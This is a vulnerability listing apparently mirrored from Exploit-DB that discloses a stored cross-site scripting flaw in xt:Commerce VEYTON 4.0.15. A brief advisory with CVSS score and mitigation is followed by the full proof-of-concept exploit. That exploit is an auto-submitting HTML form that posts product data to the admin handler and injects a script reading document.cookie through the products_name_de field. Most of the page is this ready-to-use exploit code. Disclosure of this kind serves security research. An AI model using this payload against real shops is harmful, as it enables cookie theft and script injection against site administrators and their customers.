xt:Commerce VEYTON 4.0.15 (products_name_de) Script Insertion Vulnerability

vendor:

xt:Commerce VEYTON

by:

Gjoko 'LiquidWorm' Krstic

5.5

CVSS

MEDIUM

Stored Cross-Site Scripting (XSS)

CWE

Product Name: xt:Commerce VEYTON

Affected Version From: VEYTON 4.0.15 Professional/Merchant/Ultimate

Affected Version To: VEYTON 4.0.15 Professional/Merchant/Ultimate

Patch Exists: NO

Related CWE:

CPE: a:xt:commerce:veyton:4.0.15

Metasploit:

Other Scripts:

Platforms Tested: Microsoft Windows 7 Ultimate SP1 (EN), Apache 2.4.2 (Win32), PHP 5.4.4, MySQL 5.5.25a

2012

xt:Commerce VEYTON 4.0.15 (products_name_de) Script Insertion Vulnerability

xt:Commerce suffers from a stored XSS vulnerability when parsing user input to the 'products_name_de' parameter via POST method thru '/xtAdmin/adminHandler.php' script. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user's browser session.

Mitigation:

Apply proper input validation and sanitization on user input to prevent script injection. Update to a patched version of xt:Commerce VEYTON.

Source

Exploit-DB raw data:

<!DOCTYPE html>
<!--

xt:Commerce VEYTON 4.0.15 (products_name_de) Script Insertion Vulnerability


Vendor: xt:Commerce GmbH / xt:Commerce International Ltd.
Product web page: http://www.xt-commerce.com
Affected version: VEYTON 4.0.15 Professional/Merchant/Ultimate

Summary: One shop system, many shop solutions. The shop software
xt:Commerce 4 is the basic framework for online shops and for
merchants who install and configure their own shop.

Desc: xt:Commerce suffers from a stored XSS vulnerability when
parsing user input to the 'products_name_de' parameter via POST
method thru '/xtAdmin/adminHandler.php' script. Attackers can
exploit this weakness to execute arbitrary HTML and script code
in a user's browser session.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2012-5102
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5102.php


19.08.2012

-->


<html>
<head>
<title>xt:Commerce VEYTON 4.0.15 (products_name_de) Script Insertion Vulnerability</title>
</head>
<body>
<form name="XSS" method="POST" action="http://localhost/xtAdmin/adminHandler.php?load_section=product&pg=overview&parentNode=_pnl1345421066692_7751&edit_id=6&gridHandle=productgridForm&edit_id=6&save=true">
<input type="hidden" name="date_available" value="2012-08-28 12:00:00" />
<input type="hidden" name="flag_has_specials" value="0" />
<input type="hidden" name="google_product_cat" value="New" />
<input type="hidden" name="group_permission_info" value="Ihr Rechte-System ist eingestellt auf "Blacklist" Wenn Sie eine Berechtigung auswählen wird dieser Datensatz für die Gruppe deaktiviert!" />
<input type="hidden" name="manufacturers_id" value="0" />
<input type="hidden" name="meta_description_de" value="XSS" />
<input type="hidden" name="meta_keywords_de" value="ZSL-2012-5102" />
<input type="hidden" name="meta_title_de" value="Vulnerability" />
<input type="hidden" name="permission_id" value="1" />
<input type="hidden" name="price_flag_graduated_1" value="0" />
<input type="hidden" name="price_flag_graduated_2" value="0" />
<input type="hidden" name="price_flag_graduated_3" value="0" />
<input type="hidden" name="price_flag_graduated_all" value="0" />
<input type="hidden" name="product_list_template" value="" />
<input type="hidden" name="product_template" value="" />
<input type="hidden" name="products_average_quantity" value="0" />
<input type="hidden" name="products_cmc" value="" />
<input type="hidden" name="products_description_de" value="thricer" />
<input type="hidden" name="products_ean" value="1" />
<input type="hidden" name="products_id" value="10" />
<input type="hidden" name="products_image" value="Bild" />
<input type="hidden" name="products_keywords_de" value="Zero Science Lab" />
<input type="hidden" name="products_master_model" value="" />
<input type="hidden" name="products_model" value="T-3000" />
<input type="hidden" name="products_model_old" value="T-1000" />
<input type="hidden" name="products_name_de" value='"><script>alert(document.cookie);</script>' />
<input type="hidden" name="products_option_list_temp..." value="" />
<input type="hidden" name="products_option_template" value="" />
<input type="hidden" name="products_owner" value="1" />
<input type="hidden" name="products_price" value="0" />
<input type="hidden" name="products_quantity" value="0.00" />
<input type="hidden" name="products_shippingtime" value="0" />
<input type="hidden" name="products_short_descriptio..." value="t00t" />
<input type="hidden" name="products_sort" value="0" />
<input type="hidden" name="products_startpage_sort" value="0" />
<input type="hidden" name="products_tax_class_id" value="0" />
<input type="hidden" name="products_url_de" value="www.zeroscience.mk" />
<input type="hidden" name="products_vpe" value="0" />
<input type="hidden" name="products_vpe_value" value="0.0000" />
<input type="hidden" name="products_weight" value="0.0000" />
<input type="hidden" name="shop_permission_info" value="Ihr Rechte-System ist eingestellt auf "Blacklist" Wenn Sie eine Berechtigung auswählen wird dieser Datensatz für die Gruppe deaktiviert!" />
<input type="hidden" name="total_downloads" value="0" />
<input type="hidden" name="url_text_de" value="de/a2" />
</form>
<script type="text/javascript">
document.XSS.submit();
</script>
</body>
</html>